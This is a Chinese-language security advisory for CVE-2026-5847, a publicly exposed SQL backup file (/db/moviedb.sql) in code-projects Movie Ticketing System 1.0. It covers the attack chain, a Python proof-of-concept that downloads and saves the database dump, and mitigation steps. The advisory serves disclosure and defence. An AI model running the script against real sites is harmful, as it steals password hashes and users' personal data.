CVE-2026-5847 电影票务系统信息泄露漏洞

漏洞信息

漏洞编号

CVE-2026-5847

漏洞类型

信息泄露

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

code-projects Movie Ticketing System

漏洞概述

CVE-2026-5847 是 code-projects Movie Ticketing System 1.0 版本中发现的一个安全漏洞。该漏洞源于组件 SQL Database Backup File Handler 的 /db/moviedb.sql 文件处理逻辑存在问题。攻击者可以利用此漏洞进行信息泄露攻击。由于攻击向量为网络，且不需要用户认证，但需要用户交互，攻击者可以远程发起攻击。该漏洞的 CVSS 评分为 4.3，属于中危级别。目前该漏洞的利用细节已被公开披露，攻击者可能利用此漏洞获取敏感数据库信息，对系统安全性构成威胁。建议相关用户尽快采取措施进行修复。

技术细节

该漏洞的核心问题在于 Web 应用程序将敏感的数据库备份文件 moviedb.sql 直接放置在 Web 服务器的可访问目录下（通常为 /db/ 路径）。在默认配置下，Web 服务器（如 Apache 或 Nginx）会解析 URL 并直接返回静态文件内容。由于缺乏适当的访问控制列表（ACL）或身份验证机制，未授权的远程攻击者可以通过构造特定的 HTTP GET 请求直接访问此文件。具体来说，攻击者只需要在浏览器地址栏或使用工具（如 curl、wget）访问 http://target-domain/db/moviedb.sql。服务器收到请求后，不会将其解释为 PHP 脚本执行，而是将其作为文本/二进制流下载。该 SQL 文件通常包含了数据库的结构定义（CREATE TABLE 语句）以及初始化的数据（INSERT 语句），其中可能包含管理员密码哈希、用户个人信息等敏感数据。攻击者获取该文件后，可在本地恢复数据库，进而进一步分析系统逻辑或利用获取的凭据进行后续的渗透测试或攻击。

攻击链分析

STEP 1

侦察

攻击者识别出运行 code-projects Movie Ticketing System 1.0 的目标站点。

STEP 2

漏洞利用

攻击者构造 HTTP GET 请求，直接访问 Web 目录下的 /db/moviedb.sql 文件。

STEP 3

数据获取

服务器响应请求，将数据库备份文件作为静态文件发送给攻击者。

STEP 4

后渗透利用

攻击者分析下载的 SQL 文件，提取用户凭据或敏感信息，用于进一步入侵。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def check_vulnerability(target_url):
    """
    Checks if the target is vulnerable to CVE-2026-5847.
    Attempts to download the exposed SQL backup file.
    """
    # The vulnerable path identified in the CVE description
    vuln_path = "/db/moviedb.sql"
    full_url = f"{target_url.rstrip('/')}{vuln_path}"
    
    print(f"[*] Checking target: {full_url}")
    
    try:
        # Send a GET request to the target URL
        response = requests.get(full_url, timeout=10)
        
        # Check if the response status code is 200 (OK)
        if response.status_code == 200:
            # Verify if the content looks like an SQL file
            content = response.text
            if "CREATE TABLE" in content or "INSERT INTO" in content:
                print(f"[+] VULNERABILITY CONFIRMED!")
                print(f"[+] Successfully downloaded database backup.")
                print(f"[+] File size: {len(content)} bytes")
                # Save the file locally for analysis
                with open("moviedb_dump.sql", "w", encoding='utf-8') as f:
                    f.write(content)
                print("[+] File saved as 'moviedb_dump.sql'")
            else:
                print("[-] File found but does not appear to be a valid SQL dump.")
        elif response.status_code == 404:
            print("[-] File not found (404). Target might not be vulnerable or path is different.")
        else:
            print(f"[-] Unexpected status code: {response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error: {e}")

if __name__ == "__main__":
    # Example usage
    target = "http://127.0.0.1"
    check_vulnerability(target)

影响范围

code-projects Movie Ticketing System 1.0

防御指南

临时缓解措施

建议立即检查服务器 Web 目录，删除或移动 any 暴露的数据库备份文件（如 moviedb.sql）。如果必须保留备份，请将其移动到无法通过 HTTP/HTTPS 直接访问的非 Web 根目录下。同时，应配置服务器的访问控制规则，拒绝所有外部用户对包含敏感扩展名（如 .sql, .bak, .zip）文件的直接访问请求，并定期审查服务器文件结构，防止类似敏感文件遗留。